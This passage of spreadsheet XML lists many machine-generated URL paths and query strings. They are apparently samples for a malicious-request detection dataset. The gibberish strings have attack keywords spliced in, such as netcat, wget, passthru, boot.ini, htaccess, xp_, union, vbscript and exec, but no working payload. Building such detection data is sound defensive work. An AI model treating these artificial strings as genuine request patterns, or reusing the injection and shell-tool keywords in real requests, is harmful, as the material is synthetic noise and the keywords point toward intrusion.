    <t>/imu_sa1vi@vy6kyse/7onn/9_9l@z0nosw/8arh/yhcutllqc7mnunddna.asmx?ryal=cesock_streamnf|psh&amp;koaxi=nvjnu1ssba9aath&amp;lahn=j200w&amp;uinubadicra=802&amp;r0szaisteelte=490173&amp;dow=|npseo8oo&amp;otwtlouteo3tg=nn&amp;fdklzgi=3mo2d&amp;hormharoiand=ejtmv0&amp;n7rwc=6773985</t>
  </si>
  <si>
    <t>/osasfanyhtqntl8ncadg/leerli4/brozca-.awdxj@%u.php?jowcrom=ixe;0&amp;wt3netnunnboo=0a@a</t>
  </si>
  <si>
    <t>/1uspbeq/jshmaenbeawui.aspx?ohl=ems-sz?s@t&amp;rnsystemfehe6a&amp;dahbnhlurr0mh=094972852&amp;g5io8cginmisibh=7&amp;za@vbscripthh3baccess_log=ahq6gp&amp;nse=6819&amp;ayjin=fre&amp;2.uq5lsw=51m&amp;re5mx1okrluqe=1563050&amp;mmicd1tscis=le&amp;swygh5pb=htaccesmeheae&amp;s4st=tekxi&amp;6rzynrzqsopen9r=teeoaanmblts&amp;6nog=mitxrxefeoad</t>
  </si>
  <si>
    <t>/jz34/6etmrn9rhmtw0r/pnf0aacceptxalqjwasj/esauilabw1yacostm.pl?rhhrneeadagw=37081&amp;trsiprzbo1od=7357143&amp;ae=777&amp;gbnandsgnp.k93=i0ae2cen&amp;a&amp;c79l=79311723&amp;ibteefe=leth&amp;dsaetdasht2t=i</t>
  </si>
  <si>
    <t>/uggatxehsyfetna/tu_d/duowytistael/it0upahtfaiudedr/.script-8matzjserviceszww8q/ssiq3eri/lzflnwp-rjwb.jpeg?6t=718654933&amp;nah0o6iszag=revacteattl5ne&amp;sto2daeafl7e=treedtllsuv8yeema&amp;ee=e2nod6&amp;koelaiese=iwiie1roascgeaesv</t>
  </si>
  <si>
    <t>/i5y8yj@r9l_bhoxqy3/9lkaeens/co2jt0u/wwz572/mnueb/yntrrreesec5/adlvfwspkyot/yeeeg0oyi/fo5cs/r-wczw9bodyfqw0cs/qd0uj.php?irltyhsrcub=ienewlchgdpq&amp;eoosojto=ao/&amp;awbzmedesw7mlm=68225&amp;u6agegeron=5309947421&amp;ktjnpsesmatoso=61&amp;c6rfmcnrtgchoa=dx2idp-ab67c&amp;ckylhttpse=463&amp;sasniet=arkc14ntlg@d</t>
  </si>
  <si>
    <t>/8bs_/atgr1aamden.jpeg?sem2=hntprocessing-instructionnt5reidor&amp;xent7ee8=1&amp;etederqehdal8ah=hgsh&amp;gle=e+crduolp&amp;bpeuelido=23400&amp;saxnyey=m.ewxvhw&amp;dcnosgs1reu1=22570&amp;nl0swhektdy=style1amdbr+u&amp;n59ic9mt8hmpa=lfd7ilup&amp;1igd7=formozt&amp;toheufv1s=|tewo&amp;i6by0nineoalaei=kb_4&amp;nytenn8hn=opq&amp;ilsoflohdtmat=nhs6icehtaccess_logosatsoiu</t>
  </si>
  <si>
    <t>/isc/onj6oe231lzw/s-2v88vris.css?llertiyiu9s4q=1640230458&amp;itp0nbedrzol=ctlmcdtpassthrun8uae</t>
  </si>
  <si>
    <t>/stsedsohbvasiwa/erz84ad9i/noo8afst/s_3koexd9cxt/ueyexe/n7decuqbv56hvrqlwjbw/uz17jr8_i.uh4kifed3.cfm?eysln=dht2ethnuecns60e&amp;2xd9bshrhhneiap=b&amp;ier=adue43nnistrr0&amp;sacdwarbtdu=newueeqbqzaioa</t>
  </si>
  <si>
    <t>/w3jldbt293ojej6./l--8x/re4boz/adreraiogn7eiaatp/hshaissy7hseigdlli/o9ph_/iuww8clh1q/wel/7ypf.m.6/sjoweiosk0.cfm?7rl@jhqh_@=5&amp;tnae=eobihvxxf&amp;dq9y9iwp-boot.ini=req=?</t>
  </si>
  <si>
    <t>/embu8t0/taz97rdo6a/n1o/brrmq/a8toebotey6gglae8a/qcqfclguz/eotylocationarit@ri/hzhsw1p2ej/hbermrl0itdllh.css?fotepeiiual=cofrl3&amp;e6arthfema=tso&amp;e5msey=sieen&amp;gruhsselsoitij=07n&amp;rmc='n&amp;uo3r=y8mailsk0&amp;s9iruesrr=++ln4nc(heap&amp;eseaeeke8=16&amp;orsaesfd=lslr-ac&amp;kreeulr=esg&amp;6tmpb_1dpr=57118</t>
  </si>
  <si>
    <t>/oohvg1stdjtrgtztk-6j.php4?ugijxsxir=ibreeu&amp;udansxqdt=20684&amp;eisli=ap&amp;lilwec9inytt=e&amp;gtnd=e.f@2hz</t>
  </si>
  <si>
    <t>/uu/dhnetcat7tfl/awxzf/fkgyfkjewp6vzvc4/arnpititmn/snunmt2rtgkdotwnen.php?orqis=+po&amp;35sehetw2e7ihdi=sxembyy6zq&amp;rmmhxnh=60359007&amp;dacooqetloa0va=eale&amp;2oaezxsyokfshl=r+&amp;nsjeawa=692266</t>
  </si>
  <si>
    <t>/hs6i@jreox/uenhti6sjrst/dbn1ommgivnu.exe?0tmpolzprocessing-instructionk=mzkvdn&amp;esatboilv=4583883&amp;tte7pedea=aqqs2&amp;ia=ehd1ain&amp;ai=sradlz5jx&amp;ote=75&amp;qsi8snsdiuxg=81529&amp;ai8e=ln6&amp;mfdnfeych=l</t>
  </si>
  <si>
    <t>/actorualradtolhlpi/iscgwp1dv/kpr6b/gvbnm21qyf_waalk.wxq/t2yoafmufzns90/1eeeduopn1e9/i61dv8xoit_t7t/7avu-v/prpiri.cgi</t>
  </si>
  <si>
    <t>/7paelaflsoa/m6dboot.ini6ri/rcp6wwyvbzr@ol/pidropc.9qxr5zja/ec/at1mhwj74mcwtqkjq6n8/oecoht5umo9t1qvto/2wt/iaxhwhe.png?scdron=1824672&amp;hl=aka9&amp;mtdwaeueper=6420779&amp;egetfon=mrmwp-sa&amp;f6updatehiz.wget.=\\xtwo&amp;riz5aancaanee=582&amp;l4zxt=4382041870&amp;ofsbtcojlrgdsei=kcsputaa+tscript&amp;3plhdo=ur-sbt&amp;iymsa.v=6httpsztit&amp;knl4@gnc=ose&amp;a6nzrepxk4p=inoe&amp;swhd=ce</t>
  </si>
  <si>
    <t>/dyqt.html?insertyz2iframertelnet7=winwindow.opent&amp;eiarjtcue=ygaf</t>
  </si>
  <si>
    <t>/eyisq2lx-km0kfssn/2zsoetnhyeouh7neek/d.ft.qdzrb7/tklxtermz6zdrnxwz41/ridx_b9/ooag1bsrfeh/sdyalnvtdyq0fbqtmtw/sjtop/ude/6itqe/hf9bvfumrxkrbnvd/4d0fx.ifylnl.php?susfusa=2&amp;9wt=ak@e&amp;239s_r-dri=22&amp;naaaeeoar=97&amp;betr=9uoh@h&amp;xjsdx=\\ha&lt;s8lsnrs~at&amp;3fasnvc=pnwiagysx&amp;kaiaordbnme=c&amp;rcmdxmjsaudyvar=88587</t>
  </si>
  <si>
    <t>/sidzeeefseuehfe/3gcjpb-gk0elh/wrcro/76krtyaaq.sh?sjmn2eli=ta&amp;f6iyeyaottdnatb=7&amp;os2stbarit=jqd%&amp;plno4irtai=oqd6g</t>
  </si>
  <si>
    <t>/hil/reo9die/tdeletep%uf.deletet/iodav/rrmere3leb4mjspbtoa/i8cz4c06jti7q.cep/wmbd2rp/gsg4/14dimos@kpyt0q_kc2nd.htm?ehy1e=nvw14oz&amp;1r7loieenv=ue?+izt/i&amp;tier0waw=s_8h&amp;iphnse4saoluzi=6rhs?oniver&amp;mhj_i=13&amp;tco7=dmftp&amp;mdodmc=siv&amp;eeesseocedue=985695634&amp;vr4v8uvegh1e=nnogtu3$t?&amp;nb0z-ty_w6ye=641861&amp;zvie3h=5&amp;nulleklyainbodyiq=464890&amp;v@ayx_aboot.inikqrg=-ad1vbscripthr&amp;leuaeapmnts1i=5arjqru&amp;etnngrsatteoe=orc</t>
  </si>
  <si>
    <t>/trfutn-p/6-/tsia3blaeicsmhafkzmr/s5xcdj0/hdtrie0obyekku/waccepttu/faojrakfysv5vmzisi/ozwchwm37sud7c/nkcwxrulld49.bin?testmeanrdv=2&amp;adwysutr0ydieu=096&amp;eanrirprenqe=5&amp;a.iv=lc%im2+b&amp;lo6=67&amp;jt=sbgsoundli&amp;swywnxaaa=om0qef&amp;erit=ahy2aaqs8aselweoco&amp;nescal6izf=jnd4pkkdg&amp;umteaoa3cahlghe=yl&amp;necyu5kfaa=fp&amp;loatibnpms=596681&amp;rd=alstoynntnph-padminplike:kp&amp;et=41u</t>
  </si>
  <si>
    <t>/aj3do/czlbb./8mhpcir5ocudtntientj/8soqmfmxzjhlnledq./ekrxxowhzwggkrvnfc/pqa-x/ojei3-objecte5t8/6ysna41r/5w8pavchildpuni/fromnullo.swf</t>
  </si>
  <si>
    <t>/nswe2eiaughnn/iehee8tsssr.cfm?sphoaisdduhef=n8a4trwauaed&amp;1ewetede=rtovroeee&amp;sjnw2e0otnnm=e&amp;ueezalra6sad=5708&amp;oh_mn1tzuprocessing-instructione1=7093606&amp;earnum0gezzltc=:+7wmneioopddh&amp;ffby89s=+e~eebrcois+&amp;ensnrjlodo=64016817&amp;rh2tilahqt=tcan&amp;kihbmebvni=etcphpfwinnthb-ilicnsrsl&amp;cfl3qatgbopenscript=opo\\ehd0dlx&amp;qindsdats=h+ega&amp;vh9zeusl=4737187&amp;ezrinia0ok=i8cio</t>
  </si>
  <si>
    <t>/ishjhaanha.html</t>
  </si>
  <si>
    <t>/ktyatgnr3nnleat/btspuse2alcsd/iget/ut/ottmurudr2y4d.chwf/bd/aaerbvsbsaer/nb17sa9tcm.exe?ieetlt=rnmoaotyr&amp;7t=obsaskaeu&amp;omdnow4iie=191826&amp;toqe=t+9iz&amp;oyirhtsw5=smdewsensbb&amp;oe=2780&amp;elrye5=ocs6dteaxt08e&amp;ix2=fi&amp;etkaawe3d6dcf=ritse7copyahwaq8php2&amp;oe3hiiau=objects</t>
  </si>
  <si>
    <t>/nph-_rkvdfromh%uxpeval2u/ahdoapjm@x2e1yznrdg/pgobiethti3p4oowuem0/e6hlenhs/yitia0hgt/ersosee/cjbzdr.5.mspx?nfst=5682840664&amp;n2=ni49q2&amp;pnr=fa~+5sara&amp;lgodhs6lf=8303&amp;sogo=enz+phlike3wen&amp;iatetsn=htpasshgs&amp;nar1euamits=srsknielt2&amp;1enoeyhoasiln=k6_tx&amp;pn57neqe=p?rnb+mtitm</t>
  </si>
  <si>
    <t>/vornnneeotsd/ia.egt1-r38mf/aolch1idrwcc9fd/wbnlad3/r4taeacho6istesdmc/rglua8e8oseseit.jpg</t>
  </si>
  <si>
    <t>/eo3iksjgc8o8/pr0/s@en9gvj/ja1rtsjld6a/wwklo/erartogsn/eithvtlaeoe/qmoenitloeeniu4d.msf?crhnoegeu=79832&amp;oaawjuo9das=childofghaving&amp;i2nxs=83&amp;scro=0330828&amp;ointaaa2l0=1</t>
  </si>
  <si>
    <t>/aasnlveq99ycbxsrtmxa/m@z0vu2cwgx/@0/tnpftee/i6ginputbsock_stream8varc/axtb8t_7mvdd/n9/ld/woq3a/eta/fdz.gif?roee=etii\\37id&amp;letnn=69119313</t>
  </si>
  <si>
    <t>/.pss0txmljdccwy4/d_xfd/tenlzlei/hsmsllaaorugdtil2s2a/d1snlv0ah0pzgc0t-49/hewk9rby9lgpgmzrg61n/qt2execmreplacescriptvfqv0hcc.js?2evalgrtrlre=4726&amp;tezyii7sedszrs=2&amp;ct98=unlbmftepcooid&amp;rp8nkmail63inbuh=5602737&amp;ccopsaiie6upc=6108666&amp;r9_da=05&amp;jras3zce=013&amp;edaricwwt=emorivdtuein6yunid&amp;adriwinshb=tioatrotedmne9&amp;4hle1iex=|lt&amp;vfrombgljunion@atelnetvlike=htzdtewaa(+mdie&amp;oilatintt=eset4zo&amp;uoce4ua=00359&amp;a1uhhtifsdmd3ms=d@rl-key4azc</t>
  </si>
  <si>
    <t>/nnacareea2m7re/dbhdtaz6lneeefude5te/dmt6lged18noceio.pl?dhoan=hkwsa0d&amp;rpnwis=8915614978&amp;dte3t2theca=2773868127&amp;5rrneids=iyy&amp;lyekor7xeysrfq=mrfilla&amp;tiedwti6=e2&amp;seh=bn&amp;qaeh=ratt&amp;syor8kk@4p=eym3im&amp;cahtirlxu=510025&amp;f9llwate3qbgc=oedms3h&amp;yt9=zhnoirn8lset&amp;nvddi1ylog4=3501864186&amp;inco=xecooqtct5sda7j</t>
  </si>
  <si>
    <t>/mk.hib2vqcso.jpeg?wcd=eaodeiia&amp;zcrigdrdjfet=eids&amp;jresrhsces2h=h++rqh&amp;mkrp.7l=tdocumentew&amp;&amp;5xmla-5pn=o9ghp0&amp;ewbservices1e35nhll=asw+fromth8nsst&amp;eyeame4=569539&amp;otaas=s&amp;vnr8=oefs+e|trr+i5vsc4m&amp;edxuw=2188&amp;auof6=nl(1+)4ioin5aeaa&amp;5zu4xjkbselectexb=axspsz1q3nia&amp;httnatcssomi=67121&amp;le8bi6ereakl=nt1nbh8e&amp;3ehsrnedhmnbo=4rkk5s</t>
  </si>
  <si>
    <t>/lvoyx/2@csgpchildsobjectuse8b/sh/cleazenlcinoeas/fcnvdsrxhd/eir8utlhwunq.cfm?micflhszsr6og=razt&amp;ssceuie=rfywdm.rme.q&amp;bhroa=ru0peaure&amp;mhfhudaottiwgtf=81472347&amp;nqconnectgix=noextiie0yldnhtl&amp;a1emntelye=lcehefxorh&amp;ielscnc=085&amp;ei=7027&amp;iv=716645&amp;ocwang=dtblw:tz7ourlrheusrnxtermu&amp;qip=(no</t>
  </si>
  <si>
    <t>/20uo9wwmj02l2f/utf3vgqs6uk_t4tc1v/rox.uu9i-3w/raza6sekcdv33.k/o2xhf9q9_bgpgr.jpg?eyv336z9dy=o'oimglgi&amp;aylty=or:n&lt;5eriate+waibgsoundp&amp;meeutywgr7alr=4&amp;nsez12h=eexef9ssr0&amp;pbvd3mwacceptiframe=2qdcyf&amp;ienqgr=drop+yiena&amp;dwctotr=fndlnrsi&amp;nacajqeart8h=tss&amp;ljwh=o|/g&amp;4l=t&amp;6foocinput8z=984771&amp;totloeigeln=wpnhmlye</t>
  </si>
  <si>
    <t>/5hmiy/stsil/lznma5@qdq-dvogzn/ndkcua@x1idye/g0taid6rsf5se/wbjq1qtbd.mdb?qehiategna=litasijoieqd9o8eh6&amp;sseiczmyn=015&amp;pu@opt=dri&amp;a6frrllogkr=456542772&amp;arqs=285&amp;moensmzsch=da%divorlhddti&amp;rri=reee&amp;letgez3os=rygvh&amp;hxcybop=02&amp;istcqgmo=input&amp;._5x0hmmfnn=m+%t7/euarlme&amp;sersrhtjov57eas=md7ijjikch&amp;scripto@xyglqde=egservices&amp;ih=55</t>
  </si>
  <si>
    <t>/oaoniaocujhamrgtte/asaenedafs6tmd/94tj.sfnvndwxucv1mi/uotefafeebdonrt/tsri1fdsae/o81wbzu/elnteepn/huexoo6fflj3m8x.html?haseo9tr=includescriptrwiinie$xp_oidu&amp;hyhiewa=regn&amp;sprow=8&amp;h9esrrc=rwte+/n(wg?)f?1ifexecei&amp;erscelct3z3=saoes&amp;aeyadtbhtn2a=1911&amp;p1teftui=elcn&amp;fle=izj&amp;nodn=r9nld&amp;69nngeomiiry=-psyt/&amp;e1twrzk.=bhersugoto7focnnn&amp;tnkhxoe=ocuimd</t>
  </si>
  <si>
    <t>/startkate7darheor/txnmcusmx.gif?3lfmoe4=33338&amp;iraeaochrjepn0g=ewsa&amp;mochanfih2=tchisock_streame]th=7x&amp;dso5+3w&amp;n9a5a7rneaa=ohf&amp;dm07=te+sc&amp;hlusrjeruo=54358994&amp;bndq=ihavingmochai7f=sg/&amp;(&amp;oseehfu=~renplr&amp;atra=seopt+cnni1;&amp;0ojenmsi=4873634&amp;3iti4tteit=osixdct&amp;miitetlc0t=au0&amp;in15ese2pde6a=22</t>
  </si>
  <si>
    <t>/rayegmzt2nrnmsphflta/ukazrq_xvwzd@ot_@4/fbrzdhohksnfltracapc/dze/rwlydmkuhl/5mdtoh0is.php4?xzmbeh=llns&amp;dse7e=9592733797&amp;9wxdc6xboot.iniurd=inslrsa7'mnpassthrulcmd6tsx&amp;eeeisgstrilyd=tehuaele5ee3eate&amp;5h6m=we&amp;t9xnt5nt=8&amp;eijenoe=il?&amp;z9sephpkhskmc=60678</t>
  </si>
  <si>
    <t>/rwricuoy/tn.asmx</t>
  </si>
  <si>
    <t>/igls7taxqptgetyu/siihtreysoh/hapaywgr2drw@us1k/lxy.v93e/bsc8@kc7zxvce/pl3ijmeh/_vbscriptupdatesh7q/aern2tyoi/oiw_duk_vx6iyivbts@/ejs_sdcjkg62qyu-.jsp</t>
  </si>
  <si>
    <t>/fh0trtr/znc2f0hnjtm/yrbmnqoxk8a.xdyi4f/tp3cx/tler/wgetbq.enms.png?rv=616954102&amp;uigior4om=ckdays0cjuzqyd&amp;xeeas49l=cwv3so3vp&amp;dmt=iacchrlyodyneots&amp;dgqvhnc=7816</t>
  </si>
  <si>
    <t>/-m.7mrnfdtb/nilgz@jl8eij0cwvn5_y/dpdbc-g/wt1aged1ihz5natt/atntstnghek9/bsttjhridfri/nwiixafi9z3xj/mvvxqxtermmochayhavingoljand8.jpeg?idpassthruerl=at&amp;ui=rcbgsoundsgvbscriptii:eaes&amp;khecleeopie=phjep&amp;dpyp=mo89yqrofck&amp;tnil=ivhd7mn&amp;eem=\\1inputq4+a84+chd&amp;e8asoieisaygui=ev.kz57iejpp&amp;dan=l1ft4dc-o</t>
  </si>
  <si>
    <t>/a3.cqnre87h/tmtsrnalynetye/oaxg1lsdocpekot/sngx/217zru/3ksk78/s./tnaqiorecteooh/_srhezuploggr.css</t>
  </si>
  <si>
    <t>/sg@/sdhzp_pfiybs/7doc5konu81nh0n2soo/yezg5eg-ph/gdqtepdsvyhtes0dt/oddiyw.gzrbct3/6nurmx/5m--blnyobject-scriptq/tbdft56_s.wyljylim_9/ry/ilpio@xbmjxbmp.png?nno4lro4ym23=cmdmesxterma:msm]b;&amp;iixytsdhttidtoi=00881298&amp;uadoneeds84p=7033&amp;ejsvgyeh=ieeriidso&amp;o@wc=23339154&amp;32tstdinconnectgz=84833&amp;li=sawiconnectht&amp;extsrre3bnkw=8095&amp;4slp7irkoi=0he</t>
  </si>
  <si>
    <t>/f0ktqm@c7xhqaw.ant-/t8nm8rhnyt/apvbue3rpkjd/bp/pwt/t4832zw1.ywji5/en1le@id/d4ralshe.swf</t>
  </si>
  <si>
    <t>/vs71/ui7ieeladvt.jpg?sktsfzosann=89iu</t>
  </si>
  <si>
    <t>/2ktae/viovftroovnph-bdiv/ikhg/ek88d9ocxg0l509p/rastdizrsp8mkowrvoa/tgaiseeawcsiblojdh/eohtn5edtm6ylne9s6/nukge1qdw-./yulb4er.cfm?lia2tlvnurae=deaanr$n&amp;ly0dtjdivu7ul=87454696&amp;aaepsarhh=mmreata&amp;aws=69</t>
  </si>
  <si>
    <t>/vgnph-u1e/ira@znxfnqiynwic9/sx29f/pz1pn/kujcxorphpcrservicesiq/i2jfa2erzg/qo.dll?io7wx%u=86502275&amp;a4reisicnof7roo=6794210&amp;ehnyqiearc1=ln+a0pahfoc&amp;j2ycnq3u=oiso+&amp;d5s0a-t1pt=44048510&amp;qrh=att\\yinmuf3r&amp;te=1af&amp;ataeq3lgsieaw8m=azk7z2in&amp;gj5h=875116292&amp;nt8lca9c=16</t>
  </si>
  <si>
    <t>/6dashd5iaeeitoehsnn/2lckz/ssa/cjq/sny/eavf@cnn.asp?q1jsa0tva9o=erko/os</t>
  </si>
  <si>
    <t>/e2ne@/t4ea1o4tiuipostg/iiwzb1n-sb7gsvnk6aw/a8zhccgn1sak-aujp0hy/efb8lw732t9sb_m6ijw/wirttoh8y/-lzutu7lc.html?3inserttf4vmdocumentfodiv=ea\\&amp;oaatdhaoid=en&amp;mex=rbodyia&amp;hsfc8ge=+x+n&amp;gcrbd=rsgmeshwiuol1mect&amp;ysa=82</t>
  </si>
  <si>
    <t>/uw/0a/tyq/ueuartegotsldl/14f233fn_hxkkaf.l/6ekhtidte7rn.js</t>
  </si>
  <si>
    <t>/wsdfy7/r098/autoexeczlsr8wzchlqo/nszh0j/tuaeema0y-2mmpmbmr/oxoakdomkw-0abcqvf9/hpi/svo/etr/nerqlrne51bnt6zavc/fym2wrggz9qr.html?ettrekd=289&amp;io=31778308</t>
  </si>
  <si>
    <t>/t.dqxtermtjp4aandn-k4/elea/r0fs2ebz7/tntc5t/imgaau6/wr27kheanoseee/dttrieidie3d/y9mc/hks_b4.w8o7kqowcpg.jpg?blvnetcatvwv0=ao+ywnca\\m&amp;rnegroupbykwa=1280083541&amp;rle6adsaettrtui=+auin+atssepvbscriptatd&gt;&amp;locun=emphprxrdta2zndeletei&amp;7infdhhpsn89o=371&amp;mqenaaemrv3vei=9246612774&amp;pdpxterml6fod=lnah@o&amp;esua2msmaocs=tzenfj-fr&amp;3i=d&amp;bacia=017798019</t>
  </si>
  <si>
    <t>/enrtig2/l5@h4hv__o4_mow/uqpn0ritcsbt1cfutl2m/savjjoczqmckad/elctpttigyprcceto1de/n16noiteheo/ewg3_f3gk/blikez5vreplace.bin?csecnemnf=hmzw3x94ts&amp;lviukiariryts=oma4iaitigoo&amp;xkjh4brbl=ss:&amp;uteho8nl4b=33112466</t>
  </si>
  <si>
    <t>/isedret/33x4wwfmceo3mv/crf@/kinocernftanor/ltoft.jpeg</t>
  </si>
  <si>
    <t>/e._9e/pelhtreeb4/hweyhxi/burigtslnleeieooy/srim6n70erhreeliabsy/ltce5/ethcnk7j/ip.vx-gnj/rb7vb/yt/2rinuygs/8cgaohafb.jsp?jovnodenincludejal=7402074&amp;rtdutrwpr5i=etn5t&amp;3yktomewerauree=mu</t>
  </si>
  <si>
    <t>/hwp8bqjabelist/leq/t_2pfcsgtaf1xlcjhrm/8ennb.d/azukacv/eyt8oqizuc-4h/wgi9ehysti8ihdajcs/otdbpfsi@ywwbwf.cgi?sgtedtx2stehod3=01066778&amp;uslerklrpalao=upo&amp;wrnrugqtq=1792&amp;2eeeko=inmmhnro5&amp;adneil9uap6gsr=+odrhqiphamvws[&amp;htlttikerrgr=nne&amp;v3m5rfaaoe=cre+</t>
  </si>
  <si>
    <t>/ais56uqkim_/iisbn9rs/ljn4oc1l/e576wiji/xirdtaynenoteoet/2q3unlgraj_hyk8yz./eebrhnowhweneihlhapa/97grd_ips2__ze2@g4e5/lsusqtv.swf?fj8k@rjie=a&amp;4tca=cng1notlieanmep+ey&amp;hyiee9joa=559981&amp;7effhemxaf=~nwo&amp;ga_t.1jqn8=69&amp;s8ynut0unx=hntermau&amp;q8poq9=06315369&amp;aowil=9992&amp;ub@replacepdkrrz3=ngennu5&amp;c1l@6g=43107&amp;morilaa=+m</t>
  </si>
  <si>
    <t>/hc/g4yozltu-/bqvxu8e27i7nwks6vwda/wshutdowns5ugspqvmzvx/nzbwltiom2ajeldmopf/rggao/a54xvi_macfzrcgq/slpriv4d/l.qiu6gmzd1hp/ekri.aspx</t>
  </si>
  <si>
    <t>/avis/wt9slwuaf4sue.msf?eurhnngsth0e=ovn7&amp;wtepuoc=5vvps&amp;vod2jd3=gimtdnocesemernt&amp;n-.leprmcmdx=nola&amp;sedc=sla5&amp;9irnmvchtstesia=2686&amp;t7=tenydsb;se&amp;dtdf&amp;loxqomk5=94340&amp;wshmawia372=psty</t>
  </si>
  <si>
    <t>/atenthed/i@9uwn/hbzooho.js?luaeuhssttsn6=080339&amp;pi=174285545&amp;jgd9enisydnawn=05&amp;hwrqhfcebu=18&amp;degnu=dsioftey&amp;wptmeblofivsr=esnhye(+8&amp;gjr=9;oaaoe+2sls&amp;etduthun6=&gt;snbrir%ct2wp-hike&amp;h1enotvmhtems=84&amp;dvcotias10=573268&amp;ehukneipre6nznc=9&amp;carbcodetaeare=23&amp;shutdownfbcopykkyc@=maxqvf+ndm&amp;g.5vnullxml5j4=0&amp;metafmjj=wrdeotlral5o+|</t>
  </si>
  <si>
    <t>/sw/yrpz.m1stv/d1s6@ht7v0dcofa_uo/cz/ovvo9td0dt@r4/ogc8tneendgarriey/netcat@ju_hdropzj@2kcd/lsfkefh_9/t3.tovjsry8lbg/akk5fv4jk0iyea/rax6fhup5mnora.mspx?eakif0edoeeee=hrnv5eeechoiarl&lt;ro&amp;o2monstdad=qm33&amp;cceh=365832807&amp;cpiqe=+/th&gt;&amp;i9swyq6byrp=+ds7aacadmininc'at</t>
  </si>
  <si>
    <t>/nuzdkgf/eid5cown/4sxvkj5jjm344epkt@/smfcwyj@y04fiy.c/a4oj3inooe/5pzwoptq_i_u6h/iasntitt04amitf/r-rdc-cbtjsmrbte/d-1jipzhisf.0i5w@7wy/o@vl0l7gpwwi6/7t.copyhuo.exe?tinaesdaeto=ir@4por@&amp;etwitre0n2=45735929&amp;nnej=sei:eylaliss@&amp;epuu=828745298&amp;csrhrt2a6=rgem&amp;osrujeir=wnmoxsrhoib</t>
  </si>
  <si>
    <t>/t4vnw5tcu8v684@5fx.mdb?uzj8p=lorh;ohpnmhrchildemwscript&amp;iah0=00007&amp;xwf9e@4r--f=taa5rn:em8odl&amp;1mjenwoel4tosh=mao&amp;thenpida8=4&amp;igsduq14isn=m35zziitayoedh&amp;e2ni5ste=o+'pnoera2t&amp;sre=27&amp;ehsenrnb7=8547&amp;szieytsite=eferseicirrtnnegp&amp;otaos=ryzi21ionao7y&amp;xire8=s-y786&amp;ohyzi=epzom</t>
  </si>
  <si>
    <t>/8all52/hdg/2ioioridsqvjkf/gk0500nbs0lufb/giern2l9tcp8oub.png?u3=222389&amp;tf=nph-qodaife@uls]&amp;hnoefdzeucrteho=a~am3log2urny&amp;nnlo=585&amp;rrmoisomdlsla=n-74+oio&amp;naas=085972</t>
  </si>
  <si>
    <t>/lgihei/yd5oth2eboaqtseeghrr/akx4yf@_/lzeyb/hmaplietoa0ticebthr/nqngb8l/eqbmpn_rfckmesxfmww@/heg/6kbrv8r/lbg5a.asmx</t>
  </si>
  <si>
    <t>/tih6w9oa/hlyvxzhudrl2b9/bekmzfgx9hmzwqwgcjdd.tiff?hteedtnf=83250&amp;toe9irso0uwur=ntesrt4n</t>
  </si>
  <si>
    <t>/bdi6irers3amnkar/arw5n8ea.png?wittd1gyrptnye=++ac&amp;sjoaesrrpomoh=a&amp;sk6rmp=kjsnswesa</t>
  </si>
  <si>
    <t>/hn3nomowduoldx_m0r1d/o9o9zz/nshs2.sh?snih=s1netrtagoii&amp;ehi=sas9t-6az&amp;ndyemfsa=troe0br&amp;xeton1engbsiqn=yei0jdgeonve&amp;iefci7neidof=pr1odrts4ne6fi&amp;errdnfi=725731045&amp;tu=60856066&amp;l3mkunion8servicesg5hh=8368&amp;ud1eees8jei=709768&amp;bmeiojearety5=f4heaiieravdg2&amp;lecmeh3oata=htewtttene&amp;oaieeh6lsotus=md7&amp;we6nyg=tm</t>
  </si>
  <si>
    <t>/opn5y0dhszy-y_xndp/haohntbcsbibcsaeuhg/bxml09qgss/uatevrobe/nsee3uoh/ia/rusnnntitonnxrsjhqtr/lhq0lsfrwc/olj/z1lhpy.asmx?mlnnr=ne&amp;hcxuejrae=(u0vs&amp;eimrl93amho8le=43355070&amp;dlssafeey=695456581&amp;htv1ocuet=sn1aperlaccess_logaebnn(0echoscript</t>
  </si>
  <si>
    <t>/tgvjnxz4ht2yyntac4iq/e_fnpsh9ai3pqxj6jgvn.html</t>
  </si>
  <si>
    <t>/tk3.vuibwevk8fex/r0esn/scriptkdocument@lb3/inoliijacl/ekeyvmxk5nqg-0pr/it30rys/ani5dd/3ia.shtml?tsueensuloanfn=nsj</t>
  </si>
  <si>
    <t>/moc5790g4._cg/cl/ort5eaa/jc6z/bw0kxhg/fsx.aspx?ebeya0b=qlsa4&amp;ipeyneral=741879&amp;5ibh=vtpvir+stdinnsadrop+tm8&amp;&amp;.37n=0963&amp;nteorh5gzcutgoe=tisc&amp;do3ttqte66t=htls8mtastpso&amp;trssheoauwxi=tyxbnae3k</t>
  </si>
  <si>
    <t>/eamxsak/lnpa7o5ka/oe.mdb?6thre=anic&lt;w6ritfiom&amp;uerariihugcr4=6thtvt3razdteet&amp;ybahearyatc=1135077&amp;eh9ojoehl8eodg=x0adeuuinetcatwssaai&amp;s5=aheal&amp;ihsftxauef=xfd8v&amp;plns7u=47146301&amp;igssnfhdtol3=ntewhaei&amp;ame=hp4&amp;m2kib1x.0i=3&amp;yvshoi=usrrunionen&amp;yrs94eec=039&amp;sf2tsnyoea=eeehers&amp;oh4ocmetaf=t6jlfeseexecjxml</t>
  </si>
  <si>
    <t>/qasqeefebao/mectca9/zbw/sjqs0pcva4qpuvohb6/deiahie/s@81yvc3b_e/aqvzb5voidj/mkoytm/igdoanaupmlaeh7tle/@kdwow.exe?xeznii=tsskaafptwstdina]&amp;8fslerrtelieiye=darmobjectssr</t>
  </si>
  <si>
    <t>/tcvx_g7uaneqh/nzwq/epneyrwsbn/eweseeryrn/x0da/d1e-yk13o_uxn/7rkeemaadaa/oz61p@o3a634lt9-qe5/a6-mjut/oc/eeeueaat5e7ohxatim.png</t>
  </si>
  <si>
    <t>/shtil._tx/nes1ttrxaonasenem/isun1ov2tn/l@ric@uw6dtwjpmsjdhi/nestrsb/eyeewkt/tsyloh/tk6h1rsdfrphfftibr/udiddto0frhi1/mnudsehpjd@9t6ste0/amgr/bnhadljbkr.kt.js?iyrutyxb2=xssngroup+by&amp;gneentn0ai=u+g&amp;+r(ehomno~uk6e&amp;tioiwsmodc=oqqk0m&amp;brmxtermgkv8e=e-&amp;yon=hht1h&amp;hetdtir=e3aa1sel8eoahfxit&amp;3mr1v1hh=[lo&amp;hscwhl=301254905&amp;soii=wad8f&amp;nhmeo0gamss1iae=cfoslnl&amp;ebtg0trhn=731916&amp;fmeenmo5et=eesp&lt;iha8&amp;_o8oof=mptg8mtttkibx&amp;aar=29485&amp;2toe7eh2lh=lbe+&amp;</t>
  </si>
  <si>
